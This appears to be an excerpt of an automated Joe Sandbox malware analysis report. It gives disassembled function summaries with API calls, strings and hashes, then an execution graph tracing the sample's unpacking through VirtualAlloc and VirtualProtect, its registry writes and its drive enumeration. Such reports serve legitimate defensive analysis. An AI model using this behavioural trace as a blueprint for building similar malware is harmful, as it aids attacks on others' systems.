                                                                                    • Instruction Fuzzy Hash: 2F11E53A2043022FD611B7F99C86F3E3A699BC1779B650624F62BE31E1EE618D41F211
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,00000000,?,00BFF0AE,00C0D570,?,?,00BF51FC,00000000,00000000,00BB42D7,00000008), ref: 00C0D3DD
                                                                                    • _free.LIBCMT ref: 00C0D43A
                                                                                    • _free.LIBCMT ref: 00C0D470
                                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00BFF0AE,00C0D570,?,?,00BF51FC,00000000,00000000,00BB42D7,00000008), ref: 00C0D47B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_free
                                                                                    • String ID:
                                                                                    • API String ID: 2283115069-0
                                                                                    • Opcode ID: ef80d165992f1b8352aa9fa7f55c5bf2aca8a02ebba84fc995ec65abea57d5ba
                                                                                    • Instruction ID: 36a3015c1f22d2ec1e23ce83ffdfd2ed3ac6670041c5d509647c857bf2214afd
                                                                                    • Opcode Fuzzy Hash: ef80d165992f1b8352aa9fa7f55c5bf2aca8a02ebba84fc995ec65abea57d5ba
                                                                                    • Instruction Fuzzy Hash: 5311083A2443012FD61177F95C86F2E3A599BC1775B640224F62BD31E1EE719D01F124
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,00C1C16F,00000000,00000001,00000000,00000000,?,00C1190D,?,00000000,00000000), ref: 00C1D68A
                                                                                    • GetLastError.KERNEL32(?,00C1C16F,00000000,00000001,00000000,00000000,?,00C1190D,?,00000000,00000000,?,00000000,?,00C11E59,?), ref: 00C1D696
                                                                                      • Part of subcall function 00C1D65C: CloseHandle.KERNEL32(FFFFFFFE,00C1D6A6,?,00C1C16F,00000000,00000001,00000000,00000000,?,00C1190D,?,00000000,00000000,?,00000000), ref: 00C1D66C
                                                                                    • ___initconout.LIBCMT ref: 00C1D6A6
                                                                                      • Part of subcall function 00C1D61E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C1D64D,00C1C15C,00000000,?,00C1190D,?,00000000,00000000,?), ref: 00C1D631
                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,00C1C16F,00000000,00000001,00000000,00000000,?,00C1190D,?,00000000,00000000,?), ref: 00C1D6BB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: 1e02c6e512a896ff0853a996a4c8220e7bd63134885f84ab8f4073374024ae71
                                                                                    • Instruction ID: f1bddd7fc74a2fdef1148b3d8304fcf8b31eae13ac8411a83cc3bbb6bf3c36f3
                                                                                    • Opcode Fuzzy Hash: 1e02c6e512a896ff0853a996a4c8220e7bd63134885f84ab8f4073374024ae71
                                                                                    • Instruction Fuzzy Hash: 8EF0F83601011AFFCF222F95AC04B8D3F26EB0A3A1B004510FE1E95130C63289A1FB91
                                                                                    APIs
                                                                                    • SleepConditionVariableCS.KERNELBASE(?,00BF5838,00000064), ref: 00BF58BE
                                                                                    • LeaveCriticalSection.KERNEL32(00C5C4A8,?,?,00BF5838,00000064,?,?,?,00BBD938,00C5B130,E569B89F,?,00C1FB51,000000FF,?,00B11068), ref: 00BF58C8
                                                                                    • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00BF5838,00000064,?,?,?,00BBD938,00C5B130,E569B89F,?,00C1FB51,000000FF,?,00B11068), ref: 00BF58D9
                                                                                    • EnterCriticalSection.KERNEL32(00C5C4A8,?,00BF5838,00000064,?,?,?,00BBD938,00C5B130,E569B89F,?,00C1FB51,000000FF,?,00B11068), ref: 00BF58E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                    • String ID:
                                                                                    • API String ID: 3269011525-0
                                                                                    • Opcode ID: 8097ecf239bebf96b3feb816df82c1d04aaa89ddb874320a8d4095f2c3d08477
                                                                                    • Instruction ID: 96cb61a5d326247cff86537dcd4e970d72f9065266058582107d889da841dbba
                                                                                    • Opcode Fuzzy Hash: 8097ecf239bebf96b3feb816df82c1d04aaa89ddb874320a8d4095f2c3d08477
                                                                                    • Instruction Fuzzy Hash: 10E0923A541724EFCB212B41EC58FBD3F69EF04B63B004020FA0976170CB615845CBD6
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B206EC
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B2073A
                                                                                    Strings
                                                                                    • recovered %d pages from %s, xrefs: 00B208E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: recovered %d pages from %s
                                                                                    • API String ID: 885266447-1623757624
                                                                                    • Opcode ID: a5890c16a70506778ae8422413984a353601c212721bc2c805fd5b5c1a0ddefd
                                                                                    • Instruction ID: b75df1efb7216e48cfe6cc11385744780378fd1742f7eb1dd7097fd579d75854
                                                                                    • Opcode Fuzzy Hash: a5890c16a70506778ae8422413984a353601c212721bc2c805fd5b5c1a0ddefd
                                                                                    • Instruction Fuzzy Hash: 5DB19071E1022A9FDB25DF68D880AAEB7F1FF48310F1441A8E919AB352D734AD51CBD0
                                                                                    APIs
                                                                                    • ___from_strstr_to_strchr.LIBCMT ref: 00BA31C8
                                                                                    • ___from_strstr_to_strchr.LIBCMT ref: 00BA330E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ___from_strstr_to_strchr
                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                                                                    • API String ID: 601868998-1713319389
                                                                                    • Opcode ID: d0197b1e032d991d2477191de602aebda87128fd80a8b725d3f516b4ece43729
                                                                                    • Instruction ID: 75797d147194d75f0093c45bbae7c3c0ef2e358e44105d0e6ea85354a73c649d
                                                                                    • Opcode Fuzzy Hash: d0197b1e032d991d2477191de602aebda87128fd80a8b725d3f516b4ece43729
                                                                                    • Instruction Fuzzy Hash: B0A17071D082998BEF04CF98C8953FEBFF1FB82305F2481A9D852AB785C2759644CB91
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00C0BD4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 3213639722-2276729525
                                                                                    • Opcode ID: e93b475720a1f90b26f9298554ae71a0e7acae3066cff3da9be3e5315e7b648b
                                                                                    • Instruction ID: e7857f809014260c60000234415807a32181d9ce87f13887c9a25e581943809d
                                                                                    • Opcode Fuzzy Hash: e93b475720a1f90b26f9298554ae71a0e7acae3066cff3da9be3e5315e7b648b
                                                                                    • Instruction Fuzzy Hash: 9E515B71A18202A6DB15F714D9613EDB7A0EB42B00F308D59F0F5422EDEB358EC5FA46
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __aulldiv
                                                                                    • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                    • API String ID: 3732870572-1956417402
                                                                                    • Opcode ID: e72aae0c5abf6fa60250ad897205fff0ebf49d7b65872fbcf0b9d47718adda6d
                                                                                    • Instruction ID: 69779fdae9e3f8f8a18dbc25e9b76d61a5da72c5e5cfe76e2b491694032c53df
                                                                                    • Opcode Fuzzy Hash: e72aae0c5abf6fa60250ad897205fff0ebf49d7b65872fbcf0b9d47718adda6d
                                                                                    • Instruction Fuzzy Hash: 5351F430A8C25DABDF258EAD98917BEBFF5EF45300F1440DAEA81D7341CA70894ADB54
                                                                                    APIs
                                                                                    Strings
                                                                                    • A valid JSON document must be either an array or an object value., xrefs: 00BBDBF7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::ios_base::goodtask
                                                                                    • String ID: A valid JSON document must be either an array or an object value.
                                                                                    • API String ID: 3994457883-2233189945
                                                                                    • Opcode ID: 02e9326f1fc1d54564626813e87cb18cca24445af0baffc898b24b68e6479439
                                                                                    • Instruction ID: 9be0ad25cd1d6c71193e36db57e7388172258fbc73b77dc50759cf3bcd2d0d54
                                                                                    • Opcode Fuzzy Hash: 02e9326f1fc1d54564626813e87cb18cca24445af0baffc898b24b68e6479439
                                                                                    • Instruction Fuzzy Hash: 0451DE75A1425D9BCF18DF94C891AFEB7F1FF48310F0441A9E8526B391DB789905CBA0
                                                                                    APIs
                                                                                    • std::locale::facet::facet.LIBCPMTD ref: 00BB56C0
                                                                                      • Part of subcall function 00BB3460: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00BB34A4
                                                                                      • Part of subcall function 00BA3630: char_traits.LIBCPMTD ref: 00BA366A
                                                                                      • Part of subcall function 00BBFD90: std::bad_exception::bad_exception.LIBCMTD ref: 00BBFD9D
                                                                                    • task.LIBCPMTD ref: 00BB5676
                                                                                      • Part of subcall function 00C03D08: IsProcessorFeaturePresent.KERNEL32(00000017,00C0D33D,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000,00000000), ref: 00C03D24
                                                                                      • Part of subcall function 00BB5DB0: std::bad_exception::~bad_exception.LIBCMTD ref: 00BB5DC8
                                                                                    Strings
                                                                                    • in Json::Value::operator[](ArrayIndex)const: requires arrayValue, xrefs: 00BB5624
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Processor$Virtual$Concurrency::FeaturePresentRootRoot::char_traitsstd::bad_exception::bad_exceptionstd::bad_exception::~bad_exceptionstd::locale::facet::facettask
                                                                                    • String ID: in Json::Value::operator[](ArrayIndex)const: requires arrayValue
                                                                                    • API String ID: 1981592631-467373918
                                                                                    • Opcode ID: 7160a3d0777d361b9606f98d9cc6ab59510129e0a2c3b77bf946e0dbe35852cc
                                                                                    • Instruction ID: 24bd1897e575c928b3efdc7d415d6c3334ac0b72d87670616fd3674701d913ee
                                                                                    • Opcode Fuzzy Hash: 7160a3d0777d361b9606f98d9cc6ab59510129e0a2c3b77bf946e0dbe35852cc
                                                                                    • Instruction Fuzzy Hash: 08513970900218DBDB64DF58CC91BFEB3B5AB04310F5086E9E51AA7292DB746F88CF91
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Min_valuetask
                                                                                    • String ID: assert json failed
                                                                                    • API String ID: 2692406696-3213645081
                                                                                    • Opcode ID: e18e9cce5c1569cc2f94bc1731aeed12e683a35d0e03314290f7fd6d934b6359
                                                                                    • Instruction ID: 0a06ee676046402a76b03c40359f2413d8adab436f4a768736ebf1402407c037
                                                                                    • Opcode Fuzzy Hash: e18e9cce5c1569cc2f94bc1731aeed12e683a35d0e03314290f7fd6d934b6359
                                                                                    • Instruction Fuzzy Hash: 24411574904608DFCB24CF94C881BFEBBF6EB49310F5086A9E4116B280D775A986CBA5
                                                                                    APIs
                                                                                    Strings
                                                                                    • Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36, xrefs: 00B111C6
                                                                                    • User-Agent, xrefs: 00B111CB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Smanip
                                                                                    • String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36$User-Agent
                                                                                    • API String ID: 2140389272-3885995274
                                                                                    • Opcode ID: 94333f4b9caa7f66b15495c7624471373c0b69563bac97419f407edbd90746b0
                                                                                    • Instruction ID: 334beb540ce966035668203eed08fc4033d4de7e35049639c0e3b7458f80d5ca
                                                                                    • Opcode Fuzzy Hash: 94333f4b9caa7f66b15495c7624471373c0b69563bac97419f407edbd90746b0
                                                                                    • Instruction Fuzzy Hash: A9118FB1914748ABCB10DB94DC42F9EB7B8EB04B10F4442A9B515B72E2EBB45A088B91

                                                                                    Execution Graph

                                                                                    Execution Coverage:31.5%
                                                                                    Dynamic/Decrypted Code Coverage:10.4%
                                                                                    Signature Coverage:18.9%
                                                                                    Total number of Nodes:297
                                                                                    Total number of Limit Nodes:12
                                                                                    execution_graph 1014 ad6159 1015 ad615f VirtualFree 1014->1015 1022 ad60c7 1015->1022 1016 ad6198 VirtualFree 1024 ad61b2 1016->1024 1017 ad60d5 VirtualAlloc 1017->1022 1018 ad6389 VirtualProtect 1021 ad63b7 1018->1021 1019 ad63fc VirtualProtect 1020 ad6400 1019->1020 1021->1019 1023 ad63e7 VirtualProtect 1021->1023 1022->1015 1022->1016 1022->1017 1023->1019 1023->1021 1024->1018 1025 ad62fb 1024->1025 1343 ad6014 1344 ad6035 GetModuleHandleA 1343->1344 1346 ad605f 1343->1346 1345 ad604d GetProcAddress 1344->1345 1347 ad6058 1345->1347 1347->1345 1347->1346 1347->1347 1026 ad6076 1027 ad607b 1026->1027 1031 ad60c7 1026->1031 1029 ad60b0 VirtualAlloc 1027->1029 1027->1031 1038 ad61b2 1027->1038 1028 ad615f VirtualFree 1028->1031 1029->1031 1030 ad6198 VirtualFree 1030->1038 1031->1028 1031->1030 1032 ad60d5 VirtualAlloc 1031->1032 1032->1031 1033 ad6389 VirtualProtect 1036 ad63b7 1033->1036 1034 ad63fc VirtualProtect 1035 ad6400 1034->1035 1036->1034 1037 ad63e7 VirtualProtect 1036->1037 1037->1034 1037->1036 1038->1033 1039 ad62fb 1038->1039 1040 ad14e1 1041 ad14fd GetModuleHandleA 1040->1041 1042 ad1541 1040->1042 1043 ad151a VirtualQuery 1041->1043 1046 ad1512 1041->1046 1044 ad1573 1042->1044 1047 ad1549 1042->1047 1043->1046 1051 ad1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1044->1051 1046->1042 1048 ad1566 1047->1048 1068 ad1af9 1047->1068 1049 ad1579 ExitProcess 1052 ad167f 1051->1052 1053 ad167a 1051->1053 1074 ad1718 GetSystemTimeAsFileTime 1052->1074 1086 ad139f GetVersionExA 1053->1086 1056 ad1686 1057 ad16ca 1056->1057 1060 ad16a0 CreateThread 1056->1060 1058 ad16d7 1057->1058 1059 ad16d0 1057->1059 1062 ad16dd lstrcpy 1058->1062 1063 ad170f 1058->1063 1107 ad1581 1059->1107 1079 ad2c48 memset 1060->1079 1323 ad1099 1060->1323 1062->1049 1063->1049 1067 ad1718 3 API calls 1067->1057 1069 ad1b09 1068->1069 1070 ad1b11 1068->1070 1071 ad1638 188 API calls 1069->1071 1072 ad1b16 CreateThread 1070->1072 1073 ad1b0f 1070->1073 1071->1073 1072->1073 1342 ad1638 189 API calls 1072->1342 1073->1048 1073->1073 1075 ad1735 SHSetValueA 1074->1075 1076 ad1754 1074->1076 1078 ad1786 __aulldiv 1075->1078 1077 ad175a SHGetValueA 1076->1077 1076->1078 1077->1078 1078->1056 1113 ad1973 PathFileExistsA 1079->1113 1082 ad2cb2 1084 ad16ba WaitForSingleObject 1082->1084 1085 ad2cbb VirtualFree 1082->1085 1083 ad2c8f CreateThread WaitForMultipleObjects 1083->1082 1135 ad2b8c memset GetLogicalDriveStringsA 